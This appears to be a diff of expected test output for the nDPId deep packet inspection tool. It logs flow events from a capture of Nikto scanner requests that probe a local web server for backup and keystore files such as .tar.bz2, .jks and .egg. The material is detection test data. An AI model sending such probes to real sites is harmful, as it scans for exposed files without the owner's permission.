(Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 